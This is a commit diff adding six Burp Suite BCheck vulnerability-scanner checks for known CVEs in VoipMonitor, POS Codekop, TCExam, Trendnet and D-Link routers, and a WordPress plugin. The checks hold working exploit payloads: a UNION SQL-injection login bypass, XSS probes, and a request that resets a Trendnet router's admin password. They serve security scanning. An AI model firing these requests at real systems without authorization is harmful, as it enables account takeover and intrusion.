Added CVE

CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck
CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck
CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck
CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck
CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck
CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck

vulnerabilities-CVEd/CVE-2022-2460 VoipMonitor - Pre-Auth SQL Injection.bcheck

@@ -0,0 +1,26 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2022-24260 VoipMonitor - Pre-Auth SQL Injection"
+	author: "Parimal Shaw"
+	description: "Check for CVE-2022-24260."
+	tags: "CVE-2022-24260"
+
+define:
+    potential_path = "/api.php"
+
+given host then
+    send request called check:
+		method: "POST"
+		replacing headers:
+			"Content-Type": "application/x-www-form-urlencoded",
+			"Accept": "*/*"
+		path: {potential_path}
+		body: "module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #"
+
+			if {check.response.status_code} is "200" and "\"success\":true" in {check.response.body} and "_vm_version" in {check.response.body} and "_debug" in {check.response.body} then
+					report issue:
+						severity: high
+						confidence: certain
+						detail: "A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level."
+						remediation: "Upgrade VoipMonitor to the latest version or input validation and parametrized queries including prepared statements."
+			end if

vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck

@@ -0,0 +1,23 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting"
+	author: "Parimal Shaw"
+	description: "Checks for CVE-2023-36346"
+	tags: "CVE-2023-36346"
+
+define:
+    potential_path = "/print.php?nm_member=<script>alert(document.location)</script>"
+
+given host then
+    send request called check:
+	method: "GET"
+	path: {potential_path}
+
+
+		if {check.response.status_code} is "200" and "<script>alert(document.location)</script>" in {check.response.body} and "<title>print</title>" in {check.response.body} and "text/html" in {check.response.headers} then
+		report issue:
+            severity: medium
+            confidence: certain
+            detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php."
+			remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user."
+		end if	

vulnerabilities-CVEd/CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck

@@ -0,0 +1,24 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2021-20114 TCExam <= 14.8.1 - Sensitive Information Exposure"
+	author: "Parimal Shaw"
+	description: "Check for CVE-2021-20114"
+	tags: "CVE-2021-20114"
+
+define:
+    potential_path = "/cache/backup/"
+
+
+given host then
+    send request called check:
+	method: "GET"
+	path: {potential_path}
+
+
+	  if {check.response.status_code} is "200" and "Index of /cache/backup" in {check.response.body} and "Parent Directory" in {check.response.body} and ".sql.gz" in {check.response.body} then
+	  report issue:
+            severity: high
+            confidence: certain
+            detail: "When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. Among other things, these backup files contain usernames, password hashes and other user information that was supplied on signup."
+			remediation: "It is Recommended to Upgrade to latest version or disable directory listing."
+end if

vulnerabilities-CVEd/CVE_2021_20158_Trendnet_AC2600_TEW_827DRU_2_08B01_Admin_Password.bcheck

@@ -0,0 +1,34 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2021-20158 Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change"
+	author: "Parimal Shaw"
+	description: "Check for CVE-2021-20158."
+	tags: "CVE-2021-20158"
+
+run for each:
+    potential_body = 
+	"ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=Admin@123",
+	"html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=QWRtaW5AMTIz&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id="
+
+define:
+    potential_path = "/apply_sec.cgi"
+
+
+given host then
+    send request called check:
+		method: "POST"
+		path: {potential_path}
+		body: {potential_body}
+
+			if {check.response.status_code} is "200" 
+			and "setConnectDevice" in {check.response.body} 
+			and "setInternet" in {check.response.body} 
+			and "setWlanSSID" in {check.response.body}
+			and "TEW-827DRU" in {check.response.body} 
+			and "text/html" in {check.response.headers} then
+					report issue:
+						severity: high
+						confidence: certain
+						detail: "Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.(Currently the admin Password have been chnaged to 'Admin@123')"
+						remediation: "Upgrade to Latest Version or implement proper access control to the following command"
+			end if

vulnerabilities-CVEd/CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck

@@ -0,0 +1,27 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2021-21816 D-Link DIR-3040 1.13B03 - Information Disclosure"
+	author: "Parimal Shaw"
+	description: "Check For CVE-2021-21816"
+	tags: "CVE-2021-21816"
+
+define:
+    potential_path = "/messages"
+
+
+given host then
+    send request called check:
+	method: "GET"
+	path: {potential_path}
+
+
+	  if {check.response.status_code} is "200" 
+	  and "syslog:" in {check.response.body} 
+	  and "admin" in {check.response.body}
+	  and "/etc_ro/lighttpd/www" in {check.response.body} then
+	  report issue:
+            severity: medium
+            confidence: certain
+            detail: "D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations."
+            remediation: "Proper Access Control should be implemented."
+end if

vulnerabilities-CVEd/CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck

@@ -0,0 +1,22 @@
+metadata:
+	language: v1-beta
+	name: "CVE-2022-0150 WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting"
+	author: "Parimal Shaw"
+	description: "Check for CVE-2022-0150."
+	tags: "CVE-2022-0150"
+
+define:
+    potential_path = "/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"
+
+given host then
+    send request called check:
+		method: "GET"
+		path: {potential_path}
+
+			if {check.response.status_code} is "200" and "var wah_target_src = '';alert(document.domain);//';" in {check.response.body} and "text/html" in {check.response.headers} then
+					report issue:
+						severity: medium
+						confidence: certain
+						detail: "WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page."
+						remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user."
+			end if